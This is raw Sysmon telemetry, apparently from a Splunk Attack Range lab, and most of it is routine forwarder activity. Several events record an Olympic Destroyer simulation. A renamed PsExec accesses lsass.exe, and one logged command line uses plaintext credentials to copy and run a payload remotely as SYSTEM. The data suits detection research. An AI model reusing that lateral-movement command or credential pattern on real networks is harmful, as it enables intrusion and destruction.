11:12:31.523{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51597-false10.0.1.12-8000- 23542300x8000000000000000296690Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:33.531{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3C52A2C14A2E6C16BFCC6FCFA2F3D0E9,SHA256=3BD5B8C9590CCB81D59BBCBEC930255E027C3D60B82E1B60AAE383AAC3C2B13C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:34.855{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BBAB64AAC37EA72865069886732AAB,SHA256=CE6356FE7878712ADD950E64F9218777843D47FF3E970EE78780DA85B96A6505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296692Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:34.789{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DA0CFF6F22F7359FD9F097BBBF33F2F,SHA256=5D0A19BBD428EE0497A1D7F416F1C2B5380A4230685B6D4AD8CF3D0EF39CE7EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:35.870{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E199A71CF3FC3688EBABC22704E4ECC2,SHA256=FE5F25005D0BB785B5D3C118F8D0A69C91822D69B66CE9D754F34900F3C4DD84,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.927{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.927{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:12:35.911{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.827{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-16A3-6216-0807-000000003802}4960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.827{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-16A3-6216-0807-000000003802}4960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296704Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.790{C8EA50B7-16A3-6216-0807-000000003802}49606592C:\Windows\system32\conhost.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296703Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.790{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DD99332B546CDFA29A1569E53E289BF,SHA256=511EF4CD7320B54A0C2474817C754430A9AD2A5380FCEF0591F8BC4A136C4CEE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296702Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.728{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-16A3-6216-0807-000000003802}4960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.709{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16A3-6216-0807-000000003802}4960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.558{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296697Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296696Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296695Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296694Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.545{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296693Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.542{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16A3-6216-0707-000000003802}6624C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:36.886{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5CB496771C6B60437415A0570FA32C,SHA256=76BB5C377708897D9562224503B0AF758DDE0D6CAA1CDE950BB848EE79CE2815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:36.810{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B366B95873FC733C1D87C37D42EF5F48,SHA256=7684BB67F4C0D41275A84FBDCF3AB1681AC653A4B26C469339435396215671D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:36.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1883744B60C08CA84E0B787996B53746,SHA256=1400A68C01F6377EDDD5693C9D64DD85E77155A849027DF36F9B05FAB45DC225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:36.557{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=197748D57F5245F8A9E15A07B0EF0AC3,SHA256=11E61FFC439BD355268022BA6B893410F909C226D97CE4B8480DFEF420D2096B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:37.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D688E4FB172FC1111486370449B9FD02,SHA256=74302FD56001274007E08ACFBBAD51729BFC72F8A1CDD7106BB705859B1B4755,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:35.433{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55125- 23542300x8000000000000000296716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:38.854{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A49475BA45D14ABBF38F58A6D3C507,SHA256=EAF319542559F3ECC422EFA17A88CFAD8CDBEE1CFDF9C305F22EAA8F69B74B0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:36.602{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51598-false10.0.1.12-8000- 23542300x8000000000000000220634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:38.058{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E67302A49228421C30B81C3C56A1C793,SHA256=AC0B94735439621AE4B0F441272978B24E91B2A89CD17080E299FF507CDA6976,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:36.546{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:39.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77C68364051C999B9D50BA73E660F19,SHA256=B94403202B9D8C5E15572551148E5C957FE862A5487409159F694A3A04C9C030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:39.277{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36A07C98BB67DCBA6C7C2C184C0F70C,SHA256=AB1C4D8B5285FFC1A30642870BA8DD8A8687029E24E7B3B46DD9BAC6326E564A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:40.887{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=178CF5F375702AF4D8060040BDA718E9,SHA256=1D07358F161E5EE78BA791BC6239DC71667A1B47F007330B81E35F1D0380F821,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:40.308{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9EA89E4614A31BF3A6ADB64EDF31228,SHA256=C294BEB445C20EE09D4BE5575567BBA9A574B16C5040FE4723A18B74234F4D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:40.335{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:41.888{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A511869BEFB329DA9302B4F8747DDD,SHA256=8342E071B1829D872A63EB8153B971A79870B02FC39F482736A8F600F70828E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:41.433{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D33B8BF695797EA0283CE83348594380,SHA256=B90EC88E38989C7659AC8C79FB6695B2E9B9656F416E5BD03A9DFFD7CE0AED52,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:39.809{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000296722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:42.894{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=995597BD038038D4316C601A8B5E45F2,SHA256=0EEA7C367B5B2AF83B9A29EBFA4DA8F017788549198853DC507D97800C3DA541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:42.448{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4DE6341B6B250BDF9498AEF3473A2E,SHA256=B2357A57FB90EFCC8957B38439D873FBC0D310893DBE170A602A170FBC354A82,IMPHASH=00000000000000000000000000000000falsetrue 